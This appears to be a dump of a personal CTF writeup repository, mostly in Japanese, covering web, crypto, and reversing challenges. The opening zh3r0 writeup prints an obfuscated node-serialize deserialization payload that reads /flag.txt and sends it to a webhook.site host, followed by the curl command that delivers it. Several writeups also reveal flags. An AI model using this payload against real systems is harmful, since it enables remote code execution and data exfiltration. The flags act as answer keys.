eval(String.fromCharCode(10,99,111,110,115,116,32,104,116,116,112,115,32,61,32,114,101,113,117,105,114,101,40,39,104,116,116,112,115,39,41,59,10,99,111,110,115,116,32,102,115,32,61,32,114,101,113,117,105,114,101,40,39,102,115,39,41,59,10,10,118,97,114,32,117,114,105,32,61,32,39,104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,115,105,116,101,47,100,55,48,57,52,52,50,99,45,50,51,50,97,45,52,49,100,50,45,57,50,57,100,45,50,51,55,49,101,49,102,52,100,48,99,102,47,63,113,61,39,59,10,10,118,97,114,32,100,97,116,97,32,61,32,102,115,46,114,101,97,100,70,105,108,101,83,121,110,99,40,39,47,102,108,97,103,46,116,120,116,39,41,59,10,117,114,105,32,43,61,32,100,97,116,97,46,116,111,83,116,114,105,110,103,40,41,59,10,10,99,111,110,115,116,32,114,101,113,32,61,32,104,116,116,112,115,46,114,101,113,117,101,115,116,40,117,114,105,44,32,40,114,101,115,41,32,61,62,32,123,10,32,32,32,32,114,101,115,46,111,110,40,39,100,97,116,97,39,44,32,40,99,104,117,110,107,41,32,61,62,32,123,10,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,96,36,123,99,104,117,110,107,125,96,41,59,10,32,32,32,32,125,41,59,10,125,41,10,10,114,101,113,46,111,110,40,39,101,114,114,111,114,39,44,32,40,101,41,32,61,62,32,123,10,32,32,99,111,110,115,111,108,101,46,101,114,114,111,114,40,96,36,123,101,46,109,101,115,115,97,103,101,125,96,41,59,10,125,41,59,10,10,114,101,113,46,101,110,100,40,41,59,10))}()\"}\n```\n\nBase64変換してPOSTする。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest -H 'Cookie: 
guest=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXsgZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDQsMTE2LDExNiwxMTIsMTE1LDM5LDQxLDU5LDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDIsMTE1LDM5LDQxLDU5LDEwLDEwLDExOCw5NywxMTQsMzIsMTE3LDExNCwxMDUsMzIsNjEsMzIsMzksMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0NywxMTksMTAxLDk4LDEwNCwxMTEsMTExLDEwNyw0NiwxMTUsMTA1LDExNiwxMDEsNDcsMTAwLDU1LDQ4LDU3LDUyLDUyLDUwLDk5LDQ1LDUwLDUxLDUwLDk3LDQ1LDUyLDQ5LDEwMCw1MCw0NSw1Nyw1MCw1NywxMDAsNDUsNTAsNTEsNTUsNDksMTAxLDQ5LDEwMiw1MiwxMDAsNDgsOTksMTAyLDQ3LDYzLDExMyw2MSwzOSw1OSwxMCwxMCwxMTgsOTcsMTE0LDMyLDEwMCw5NywxMTYsOTcsMzIsNjEsMzIsMTAyLDExNSw0NiwxMTQsMTAxLDk3LDEwMCw3MCwxMDUsMTA4LDEwMSw4MywxMjEsMTEwLDk5LDQwLDM5LDQ3LDEwMiwxMDgsOTcsMTAzLDQ2LDExNiwxMjAsMTE2LDM5LDQxLDU5LDEwLDExNywxMTQsMTA1LDMyLDQzLDYxLDMyLDEwMCw5NywxMTYsOTcsNDYsMTE2LDExMSw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQwLDQxLDU5LDEwLDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMTQsMTAxLDExMywzMiw2MSwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDQ2LDExNCwxMDEsMTEzLDExNywxMDEsMTE1LDExNiw0MCwxMTcsMTE0LDEwNSw0NCwzMiw0MCwxMTQsMTAxLDExNSw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE0LDEwMSwxMTUsNDYsMTExLDExMCw0MCwzOSwxMDAsOTcsMTE2LDk3LDM5LDQ0LDMyLDQwLDk5LDEwNCwxMTcsMTEwLDEwNyw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTExLDExMCwxMTUsMTExLDEwOCwxMDEsNDYsMTA4LDExMSwxMDMsNDAsOTYsMzYsMTIzLDk5LDEwNCwxMTcsMTEwLDEwNywxMjUsOTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDEyNSw0MSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMTQsMTE0LDExMSwxMTQsMzksNDQsMzIsNDAsMTAxLDQxLDMyLDYxLDYyLDMyLDEyMywxMCwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDEsMTE0LDExNCwxMTEsMTE0LDQwLDk2LDM2LDEyMywxMDEsNDYsMTA5LDEwMSwxMTUsMTE1LDk3LDEwMywxMDEsMTI1LDk2LDQxLDU5LDEwLDEyNSw0MSw1OSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMDEsMTEwLDEwMCw0MCw0MSw1OSwxMCkpfSgpIn0=;' --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Cookie: 
guest=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXsgZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDQsMTE2LDExNiwxMTIsMTE1LDM5LDQxLDU5LDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMDIsMTE1LDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSwxMDIsMTE1LDM5LDQxLDU5LDEwLDEwLDExOCw5NywxMTQsMzIsMTE3LDExNCwxMDUsMzIsNjEsMzIsMzksMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0NywxMTksMTAxLDk4LDEwNCwxMTEsMTExLDEwNyw0NiwxMTUsMTA1LDExNiwxMDEsNDcsMTAwLDU1LDQ4LDU3LDUyLDUyLDUwLDk5LDQ1LDUwLDUxLDUwLDk3LDQ1LDUyLDQ5LDEwMCw1MCw0NSw1Nyw1MCw1NywxMDAsNDUsNTAsNTEsNTUsNDksMTAxLDQ5LDEwMiw1MiwxMDAsNDgsOTksMTAyLDQ3LDYzLDExMyw2MSwzOSw1OSwxMCwxMCwxMTgsOTcsMTE0LDMyLDEwMCw5NywxMTYsOTcsMzIsNjEsMzIsMTAyLDExNSw0NiwxMTQsMTAxLDk3LDEwMCw3MCwxMDUsMTA4LDEwMSw4MywxMjEsMTEwLDk5LDQwLDM5LDQ3LDEwMiwxMDgsOTcsMTAzLDQ2LDExNiwxMjAsMTE2LDM5LDQxLDU5LDEwLDExNywxMTQsMTA1LDMyLDQzLDYxLDMyLDEwMCw5NywxMTYsOTcsNDYsMTE2LDExMSw4MywxMTYsMTE0LDEwNSwxMTAsMTAzLDQwLDQxLDU5LDEwLDEwLDk5LDExMSwxMTAsMTE1LDExNiwzMiwxMTQsMTAxLDExMywzMiw2MSwzMiwxMDQsMTE2LDExNiwxMTIsMTE1LDQ2LDExNCwxMDEsMTEzLDExNywxMDEsMTE1LDExNiw0MCwxMTcsMTE0LDEwNSw0NCwzMiw0MCwxMTQsMTAxLDExNSw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE0LDEwMSwxMTUsNDYsMTExLDExMCw0MCwzOSwxMDAsOTcsMTE2LDk3LDM5LDQ0LDMyLDQwLDk5LDEwNCwxMTcsMTEwLDEwNyw0MSwzMiw2MSw2MiwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTExLDExMCwxMTUsMTExLDEwOCwxMDEsNDYsMTA4LDExMSwxMDMsNDAsOTYsMzYsMTIzLDk5LDEwNCwxMTcsMTEwLDEwNywxMjUsOTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDEyNSw0MSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMTEsMTEwLDQwLDM5LDEwMSwxMTQsMTE0LDExMSwxMTQsMzksNDQsMzIsNDAsMTAxLDQxLDMyLDYxLDYyLDMyLDEyMywxMCwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDEsMTE0LDExNCwxMTEsMTE0LDQwLDk2LDM2LDEyMywxMDEsNDYsMTA5LDEwMSwxMTUsMTE1LDk3LDEwMywxMDEsMTI1LDk2LDQxLDU5LDEwLDEyNSw0MSw1OSwxMCwxMCwxMTQsMTAxLDExMyw0NiwxMDEsMTEwLDEwMCw0MCw0MSw1OSwxMCkpfSgpIn0=;\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 6\n< ETag: W/\"6-aTQsXDnlrl8Ad67MMsD4GBH7gZM\"\n< Date: Sat, 05 Jun 2021 04:05:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello!%\n```\n\nflagの中身を取ることができた。\n\n![](img/2021-06-05-13-06-22.png)\n\n<!-- zh3r0{4ll_y0u_h4d_t0_d0_w4s_m0v3_th3_0bjc3ts_3mper0r} -->\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.8245614171028137, "avg_line_length": 57, "blob_id": "ca80373826412c9332f7a913b4eacca4639646cc", "content_id": "818e84c9782dc5452456ac4f1d2a51d73eb2d2d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 57, "num_lines": 1, "path": "/2020/SunshineCTF/speedrun-00/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "`nc chal.2020.sunshinectf.org 30000` Author: guyinatuxedo" }, { "alpha_fraction": 0.7275747656822205, "alphanum_fraction": 0.7607973217964172, "avg_line_length": 42.14285659790039, "blob_id": "5ec1fc8e311437120f88a0c7fc374ee97da49d51", "content_id": "60b2068e5742c985d82fecf2b36fc8fe6c49b265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "no_license", "max_line_length": 194, "num_lines": 7, "path": "/2021/BCACTF_2.0/Agent_Gerald/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Agent Gerald is 
a spy in SI-6 (Stegosaurus Intelligence-6). We need you to infiltrate this top-secret SI-6 webpage, but it looks like it can only be accessed by Agent Gerald's special browser...\n\nhttp://web.bcactf.com:49156/\n\nHint 1 of 1\n\nWhat is a way webpages know what kind of browser you're using?" }, { "alpha_fraction": 0.37264150381088257, "alphanum_fraction": 0.4811320900917053, "avg_line_length": 17.434782028198242, "blob_id": "2d51a9f4adf7a6e604cd1a0e9acfe0abcd89e208", "content_id": "a5965efb880c54e9731b745b933511d5dee3dd7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/2021/Google_Capture_The_Flag_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Google Capture The Flag 2021\n\n* https://g.co/ctf\n\n * https://github.com/google/google-ctf/tree/master/2021\n\n* 2021/07/17 09:00 JST - 2021/07/19 08:59 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ---- | ---------------------- | ------- | ----: | -----: |\n| Misc | [FILESTORE](FILESTORE) | | 50 | 321 |\n\n---\n\n## Result\n\n* 50 points\n\n* 309 / 379 (> 1 pt)\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7983871102333069, "avg_line_length": 23.799999237060547, "blob_id": "2ae37ade18243b325bdf6f47db98251c9549b1cc", "content_id": "3f11e2cfbd4b0ae014c18098b53821f3890d5b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Extra/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "いつものRSA?\n\n[cry-extra.zip](https://score.wanictf.org/storage/xr6tsfdcy5xzk66juyjtrpd66nq2kxqj/cry-extra.zip)\n\nWriter : Laika\n" }, { "alpha_fraction": 0.5839999914169312, "alphanum_fraction": 0.7680000066757202, "avg_line_length": 24, "blob_id": "0cdc5af134170ea5d0ca86c16d3dd80b9d72a704", "content_id": "4052abc21067a661ee22be776d374dd2dac2a537", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 79, "num_lines": 5, "path": "/2021/UIUCTF_2021/hvhpgs{synt}/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "CS1 ciphers go brrrrr\n\n**author**: spamakin\n\n[chal](https://uiuc.tf/files/7702cafa765d3b0197d7b9a084393d40/chal?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjM5fQ.YQavQQ.xXLhI1PhFQc04UUOIQCgzqfjT80)\n" }, { "alpha_fraction": 0.2665782570838928, "alphanum_fraction": 0.3395225405693054, "avg_line_length": 49.266666412353516, "blob_id": "4254deceefe8ff6dbc75e6f68913d6ed4c964b4d", "content_id": "0153265052c153e00367fc0c112c0493454965fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 110, "num_lines": 30, "path": "/2021/redpwnCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# redpwnCTF 2021\n\n* https://ctf.redpwn.net/\n\n* 2021/07/10 04:00 JST — 2021/07/13 04:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------------------------------------- | ------------ | ----: | -----: |\n| Crypto | [baby](baby) | RSA | 102 | 827 
|\n| Pwn | [beginner-generic-pwn-number-0](beginner-generic-pwn-number-0) | BOF | 105 | 485 |\n| Misc | [compliant-lattice-feline](compliant-lattice-feline) | netcat | 102 | 1094 |\n| Web | [inspect-me](inspect-me) | Devtools | 101 | 1291 |\n| Web | [orm-bad](orm-bad) | SQLi | 102 | 1019 |\n| Web | [pastebin-1](pastebin-1) | XSS | 103 | 612 |\n| Crypto | [round-the-bases](round-the-bases) | binary | 107 | 348 |\n| Crypto | [scissor](scissor) | ROT | 132 | 1005 |\n| web | [secure](secure) | SQLi, Base64 | 104 | 535 |\n| Reversing | [wstrings](wstrings) | Ghidra | 102 | 844 |\n\n---\n\n## Result\n\n* 1032 points\n\n* 391 / 1418 (> 1 pt)\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.7822085618972778, "avg_line_length": 45.57143020629883, "blob_id": "822ad1d1875d956173d6f7ebb2a8c93f9a765934", "content_id": "3b65a8738dabe4cfec4acb3f89040cf8b7d84d28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 326, "license_type": "no_license", "max_line_length": 112, "num_lines": 7, "path": "/2021/RaRCTF_2021/minigen/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A stream cipher in only 122 bytes!\n\nNote: This has been tested on python versions `3.8` and `3.9`\n\n[minigen.py - 6d973f](https://files-ctf.rars.win/challenge-files/42/6d973fab76597c26bac5c54853670c85/minigen.py)\n\n[output.txt - 93113f](https://files-ctf.rars.win/challenge-files/42/93113f7bc2570a09052a5da3c4919f2a/output.txt)\n" }, { "alpha_fraction": 0.5644699335098267, "alphanum_fraction": 0.6026743054389954, "avg_line_length": 19.54901885986328, "blob_id": "34625875095a8056393aa7e57757892ed4281834", "content_id": "66feda8c56c5395c2628b3b8f7da893fc5634856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 76, "num_lines": 51, "path": "/2020/SunshineCTF/Password_Pandemonium/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n指定のURLに移動するとSign upが求められる。\n\n![](img/2020-11-08-02-26-28.png)\n\nいろいろ試すと、パスワードの条件が厳しいことがわかる。\n\n* `a`\n * Password is too short.\n * 8文字以上にする\n\n* `aaaaaaaa`\n * Password must include more than two special characters.\n * 2つ以上の特殊文字を入れる\n\n* `aaaa////`\n * Password must include a prime amount of numbers.\n * 素数個の数字を入れる\n\n* `aaaa////123`\n * Password must have equal amount of uppercase and lowercase characters.\n * 大文字と小文字の数を一致させる\n\n* `aaAA////123`\n * Password must include an emoji.\n * 絵文字を入れる\n\n* `aaAA////123⭐`\n * Password's MD5 hash must start with a number\n * MD5にしたとき数字から始まるようにする\n\n* `123AAaa////⭐`\n * Password must be valid JavaScript that evaluates to True.\n * javascriptでTrueと評価される値にする\n\n* `'123AAaa'!='⭐'`\n * Password must be a palindrome.\n * 回文にする\n\n* `'⭐'=='⭐'||'aA'*1==1*'Aa'||'⭐'=='⭐'`\n * Password is too long.\n * 短くする\n\n* `'⭐'=='⭐'||aA*1==1*Aa||'⭐'=='⭐'`\n\n⇒ 成功\n\nJavascriptの条件が厄介だったので、https://playcode.io/ で確認しながら操作\n\n<!-- sun{Pal1ndr0m1c_EcMaScRiPt} -->" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7939394116401672, "avg_line_length": 54, "blob_id": "d35c1e0cbe7a0565f0aaabc9901eadf89d28b3d7", "content_id": "13f92bcfa47a4c1b1f8a0dd5d1fd8ab403cc47fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 97, "num_lines": 3, "path": "/2021/dCTF_2021/Julius_ancient_script/README.md", 
"repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I found this Ancient Roman papyrus. Could you decypher it for me?\n\n[flag.txt](https://dctf.dragonsec.si/files/224c4c15f483fed5fe08a81412f594c2/flag.txt?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTc2fQ.YJ64eQ.FA3cqD3_JeC90Nw7XIhxeZsY-gw)\n" }, { "alpha_fraction": 0.3632218837738037, "alphanum_fraction": 0.6816109418869019, "avg_line_length": 23.830188751220703, "blob_id": "af690398235f59d91fecf6195a1b4fa755510e3c", "content_id": "5cc78fb8c46259879fe23c11a834760daa8ea931", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 95, "num_lines": 53, "path": "/2021/BCACTF_2.0/RSAtrix_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムと出力結果が与えられる。\n\n```py\np = 94653748632775872562206813156858988240379536044871601072940225022186828970998253\nq = 47982815420210848939631963090916124891858755590019708758250635504732488148835047\nn = p * q\ne = 3\nN = 23\n\nR = Zmod(n)\nMS = MatrixSpace(R, N, N)\ns = PermutationGroupElement('(1,6,8)(2,3,4,5,7)(9,11,13,15,17,19,21,23)(10,12,14,16,18,20,22)')\nP = MS(s.matrix())\nwith seed(1): C = MS([randrange(100) for i in range(N*N)])\nG = C * P * C^-1\n\ndef encrypt(m):\n\tM = m * G\n\treturn (M^e).list()\n```\n\n行列`C`がランダムに見えるが、シード値が固定なので`G`が一意に計算できる。\n\n`M^e = m^e * G^e`であるので、`M^e * G^-e`を計算すると、`m^e * I (I:単位行列)`が求められる。\n\n`m^e`が分かればRSA暗号の復号化をするだけである。\n\n```py\n# sage\nfrom Crypto.Util.number import *\n\np = 94653748632775872562206813156858988240379536044871601072940225022186828970998253\nq = 47982815420210848939631963090916124891858755590019708758250635504732488148835047\nn = p * q\ne = 3\nN = 23\n\nR = Zmod(n)\nMS = MatrixSpace(R, N, N)\ns = PermutationGroupElement('(1,6,8)(2,3,4,5,7)(9,11,13,15,17,19,21,23)(10,12,14,16,18,20,22)')\nP = MS(s.matrix())\nwith seed(1): C = MS([randrange(100) for i in range(N*N)])\nG = C * P * C^-1\n\nM = MS(eval(open('enc.txt','r').read())) * (G^-e)\n\nd = power_mod(e,-1,(p-1)*(q-1))\nprint(long_to_bytes(power_mod(M[0][0],d,n)))\n```\n\n<!-- bcactf{permutation-conjugation-magic-3x876oeu} -->\n" }, { "alpha_fraction": 0.7524271607398987, "alphanum_fraction": 0.7864077687263489, "avg_line_length": 21.88888931274414, "blob_id": "0f9796cec763698940bc7873d18a0c54a4ce84f9", "content_id": "c0f7ed33e75fdc00fcfcaf08860b02a83cee92d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 117, "num_lines": 9, "path": "/2021/WaniCTF21-spring/secure_document/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "本日の資料は以下を入力して圧縮しました。\n\n```\nthe password for today is nani\n```\n\n[for-secure-document.zip](https://score.wanictf.org/storage/nr6n608qbm5ebot5m5nslupzwnfldvvu/for-secure-document.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.721238911151886, "alphanum_fraction": 0.7566371560096741, "avg_line_length": 24.22222137451172, "blob_id": "9d495a84736ce547193db2e8c7946b6bc08c586c", "content_id": "074250a7bc218b79fe15c482a19df324fa6cdefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": 
"UTF-8", "text": "Similar to wasm protected site 1, but this time there is no password, only the flag.\n\nEnter the flag, and the program will check it for you\n\nhttp://web.bcactf.com:49158/\n\nHint 1 of 1\n\nWhat does the wasm do to compare each byte" }, { "alpha_fraction": 0.2818532884120941, "alphanum_fraction": 0.3474903404712677, "avg_line_length": 25.827587127685547, "blob_id": "1d28fa23203713d1a4735b42fe58c47b85aa8631", "content_id": "529ed9e558282a0aa21d6849b0d705d532b71662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 779, "license_type": "no_license", "max_line_length": 103, "num_lines": 29, "path": "/2020/SquareCTF2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Square CTF 2020\n\n* https://2020.squarectf.com/\n\n* 2020/11/14 07:00 JST — 2020/11/15 07:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------------------------------------------------- | ------------------ | ----: | -----: |\n| Crypto | [Oh_Sheet](Oh_Sheet) | google spreadsheet | 200 | 95 |\n| | [Hash_My_Awesome_Commands](Hash_My_Awesome_Commands) | timing attack | 150 | 51 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n\n---\n\n## Result\n\n* 351 points\n\n* 66 / 610 (> 1 pt)" }, { "alpha_fraction": 0.716312050819397, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 22.66666603088379, "blob_id": "576d46be7c3fe4011499bec67272f9341043b059", "content_id": "4162e0d8beed2590a5b07dca99468e11814497dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 89, "num_lines": 6, "path": "/2020/WaniCTF/l0g0n/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "🕵️‍♂️\n`nc l0g0n.wanictf.org 50002`\n\n[server.py](https://score.wanictf.org/storage/paszoeecwmnzumadajpmjqatzqejiras/server.py)\n\nWriter : Laika" }, { "alpha_fraction": 0.6415094137191772, "alphanum_fraction": 0.7672955989837646, "avg_line_length": 21.85714340209961, "blob_id": "24e64f2604d127be6d326c0e476cdc6407490e71", "content_id": "fbb49037cec31049ef77684ab771959f702e50d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/RITSEC_CTF_2021/lorem_ipsum/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/hint.jpg)\n\nFlag is case sensitive.\n\nauthor: raydan\n\n[cipher.txt](https://ctf.ritsec.club/files/152105ec4b3c4d447fac627d3d80b57d/cipher.txt?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6NDR9.YHKqLw.v7DaccC1CEtAnbLV6Ej2gH96PU0)" }, { "alpha_fraction": 0.7318295836448669, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 43.44444274902344, "blob_id": "cd56f0218e5ab34935e107998f725e2cbad7f5d7", "content_id": "8872c49a373193dcf8aa7bd4e2b907c9706304d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 399, "license_type": "no_license", "max_line_length": 210, "num_lines": 9, "path": "/2021/BCACTF_2.0/RSAtrix_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RSA, RSA, RSA. After so many RSA problems, they all start to look the same. 
But what looks different? Matrices! After a lot of detailed R&D, we're proud to present RSAtrix, the world's first* matrix RSA system!\n\n[rt1.sage](https://objects.bcactf.com/bcactf2/rsatrix-1/rt1.sage)\n\n[enc.txt](https://objects.bcactf.com/bcactf2/rsatrix-1/enc.txt)\n\nHint 1 of 1\n\nHow do you decode messages encoded in RSA?" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6780626773834229, "avg_line_length": 42.875, "blob_id": "44b2b0ad86362be93d918c8949fc8929b030b3d9", "content_id": "3b40e0fabe3875d11742896f6d457ff11114fdde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 351, "license_type": "no_license", "max_line_length": 72, "num_lines": 8, "path": "/2021/WeCTF_2021/Include/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Yet another buggy PHP website. \n \nFlag is at /flag.txt on filesystem\n\nHost 1 (San Francisco): [include.sf.ctf.so](http://include.sf.ctf.so/) \nHost 2 (Los Angeles): [include.la.ctf.so](http://include.la.ctf.so/) \nHost 3 (New York): [include.ny.ctf.so](http://include.ny.ctf.so/) \nHost 4 (Singapore): [include.sg.ctf.so](http://include.sg.ctf.so/)\n" }, { "alpha_fraction": 0.5967633128166199, "alphanum_fraction": 0.6527309417724609, "avg_line_length": 21.830768585205078, "blob_id": "e79e182598252597b4c84d8b14698b3a756ea7b2", "content_id": "f28f614c74a114bb16b077afdfde27d59104d298", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1719, "license_type": "no_license", "max_line_length": 220, "num_lines": 65, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nまず、`file` コマンドで形式を確認する。\n\n```bash\n$ file SSE_KEYGENME \nSSE_KEYGENME: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1e5c1dd325c6f4680a3e72d96aba4b57b0da3211, not stripped\n```\n\nELF形式であることが分かるので、実行してみる。\n\n```bash\n$ ./SSE_KEYGENME \n###############################\n### WELCOME TO SSE_KEYGENME ###\n### ENJOY YOUR STAY ###\n###############################\nEnter key:\n> hey\nWrong key, try again...\n```\n\n`strings`コマンドを実行してみる。\n\n```bash\n$ strings SSE_KEYGENME\n, \"&4More bytes read than expected, exiting...\nInput size not multiple of block length, exiting...\n###############################\n### WELCOME TO SSE_KEYGENME ###\n### ENJOY YOUR STAY ###\nEnter key:\nPlease enter a key.\nSuccess! 
Enjoy the rest of the competition :)\nWrong key, try again...\n```\n\nとりあえず、正しいkeyを入力できれば先に進めそう。\n\nというわけで、`angr`を使って解く。アドレスはIDAを使って確認した。\n\n![](img/2020-11-07-15-58-28.png)\n\n[参考]\n\n* https://github.com/saru2017/hxp2018-angrme\n\n```py\nimport angr\n\np = angr.Project('SSE_KEYGENME')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0xD48-0xC6D)\n# addr_failed = main_addr + (0xD4F-0xC6D)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))\n```\n\n実行結果がそのままFLAGになっている。\n\n<!-- KAF{F0R_0LD_T1M3S_S4K3} -->" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.7410714030265808, "avg_line_length": 15.470588684082031, "blob_id": "af49604ea3bbd4e39d4b2f38858a9c26650fbf56", "content_id": 